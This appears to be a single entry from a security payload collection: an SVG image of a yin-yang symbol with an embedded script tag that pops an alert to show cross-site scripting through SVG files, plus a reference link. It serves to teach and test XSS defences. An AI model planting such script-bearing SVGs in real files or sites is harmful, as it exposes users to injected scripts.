only a payload
```xml
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100">
  <circle cx="50" cy="50" r="48" fill="none" stroke="#000"/>
  <path d="M50,2a48,48 0 1 1 0,96a24 24 0 1 1 0-48a24 24 0 1 0 0-48"/>
  <circle cx="50" cy="26" r="6"/>
  <circle cx="50" cy="74" r="6" fill="#FFF"/>
  <script>alert("XSS through SVG");</script>
</svg>
```
 
Reference:
https://netsec.expert/posts/xss-through-svg/